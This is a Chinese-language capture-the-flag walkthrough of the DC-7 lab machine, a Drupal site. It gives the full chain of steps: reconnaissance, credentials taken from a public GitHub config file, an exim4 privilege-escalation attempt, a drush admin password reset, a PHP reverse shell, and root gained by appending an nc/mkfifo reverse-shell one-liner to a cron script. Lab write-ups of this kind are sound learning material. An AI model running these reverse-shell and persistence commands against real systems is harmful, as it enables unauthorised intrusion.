目錄

DC-7靶機滲透測試

1、信息收集

1.1 掃描開放的端口

1.2 訪問WEB站點

2、登錄ssh

3、 提權（suid提權）

3.1 exim4提權

4、drush 命令對任意用戶密碼進行更改

5、登錄admin

6、拿到root權限

---

?

DC-7靶機滲透測試

0x00實驗環境

kali的IP：192.168.3.188
DC-7的MAC地址：00:0C:29:FB:B4:27（192.168.3.191）

（使用Kali中的arp-scan工具掃描也可）

1、信息收集

1.1 掃描開放的端口

nmap -A 192.168.3.191 -p 1-65535 -oN nmap.A

發現開放了80端口和22端口

1.2 訪問WEB站點

發現是Drupal（是國外三大開源的PHP CMS 之一）

提示：
DC-7引入了一些“新”概念，但我將讓您弄清楚它們是什么。 :-)
盡管此挑戰并不是技術性的全部，但如果您需要訴諸于暴力破解或字典攻擊，您可能不會成功。
您將要做的就是在盒子外面思考。 方式在盒子外面。 :-)

1.2.1 掃描網站目錄

命令：dirb http://192.168.3.191/

嘗試掃描網站目錄，沒發現什么有價值的目錄，發現了robotx.txt文件，這個文件作為常見的可以讓爬蟲程序掃描的文件之一，控制是否想讓爬蟲去爬取本站信息

對于robots.txt文件，對里面的目錄或者文件都進行了訪問查看，未發現有用的信息

1.2.2? 通過查詢DC7USER查詢到DC7-User用戶

查詢了解到網站左下角為@DC7USER為推特的聯系方式，通過查詢DC7USER查詢到DC7-User用戶，從而查詢到如下信息，明顯與DC-7相關

https://github.com/Dc7User/staffdb

發現config.php，得到數據庫的用戶名和密碼（滲透測試是需要經驗積累的，不然很多都想不到！！！）

<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname); ?>

看樣子是網站mysql數據庫連接的用戶名、密碼，所有這里就不登錄網站了，直接登錄后臺。dc7user / MdR3xOgB7#dW

在user/login 登錄，登錄失敗

2、登錄ssh

用ssh登錄：ssh dc7user@192.168.3.191，登錄成功！

查看dc7user家目錄下有backup文件夾

Gpg后綴文件為加密后的文件，需要有秘鑰和密碼才能解密。（website.sql和website.tar.gz文件現在都是加密過的）

我們再看看mbox有什么：發現友有好多郵件（From: root@dc-7 (Cron Daemon)??????? To: root@dc-7）

其中的主要信息有：

Shell腳本文件 ??/opt/scripts/backups.sh

數據庫文件：/home/dc7user/backups/website.sql

網站數據： /home/dc7user/backups/website.tar.gz

從目前情況來看，website.sql和website.tar.gz文件現在都是加密過的，現在只能把目光放在另一個文件backups.sh上

2.3.1 查看一下backups.sh這個腳本文件

順利找到了加密的秘鑰，只是解密需要root權限才可以

3、 提權（suid提權）

思路1、sudo -l（查看有沒有一些命令在執行期間有root權限標簽沒有密碼保護——Not found）

思路2、查看有沒有一些具有suid權限的命令

find / -perm /4000 2>dev/null

3.1 exim4提權

3.1.1 查看exim4版本

/usr/sbin/exim4 --version

發現exim4命令的版本是4.89

3.1.2 使用searchsploit查找響應漏洞

searchsploit exim 4.

?Local Privilege Escalation（本地特權升級）

3.1.3 將響應漏洞拷貝到靶機

scp遠程拷貝

把它弄到靶機里，使用scp：
需要先在kali開啟ssh服務------Kali ssh服務
dc7user@dc-7:~$ scp root@192.168.3.188:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/? （在dc7user@dc-7:~$下拷貝）

運行exp，錯誤：

./46996.sh -m netcat

有個^M，查看此exp后，看到結尾都是M，百度后的文章：
解決“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

?

重新執行exp，先監聽kali上的8888端口：
./46996.sh -m netcat
nc -e /bin/bash 192.168.3.188 8888

?

這里很快就會斷鏈了，所以要快點：
python -c 'import pty;pty.spawn("/bin/bash")'

切換root失敗了，怎么辦啊啊啊啊啊~

無果！

4、drush 命令對任意用戶密碼進行更改

查詢drush是drupal shell專門管理drupal站點的shell，使用drush掃描得知drupal用戶為admin，cms的管理用戶

嘗試重置admin用戶密碼，說明admin用戶存在

存在！

若用戶不存在則是下面這種情況

?

重置admin密碼為admin，必須在/var/www/html目錄下執行

通過查詢可知drush 命令可以對任意用戶密碼進行更改

drush user-password admin --password="123456"

5、登錄admin

到后臺后想上傳一句話木馬進行連接，發現沒有php模塊，這樣就沒辦法解析php，在extend中點擊添加php模塊

返回頁面選擇php添加

點擊install

先在kali上監聽8888端口：nc -lvvp 8888

?

Add content——》Article

寫入反彈shell（OS命令注入）

content創建成功！

在kali上監聽已拿到反彈shell

python -c 'import pty;pty.spawn("/bin/bash")'打開shell交互

6、拿到root權限

kali本地監聽8888端口

在/opt/scripts/目錄下面輸入如下命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.191 8888 >/tmp/f" >> backups.sh

反彈成功！

查看theflag文件

總結

以上是生活随笔為你收集整理的【CyberSecurityLearning 76】DC系列之DC-7渗透测试（Drupal）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。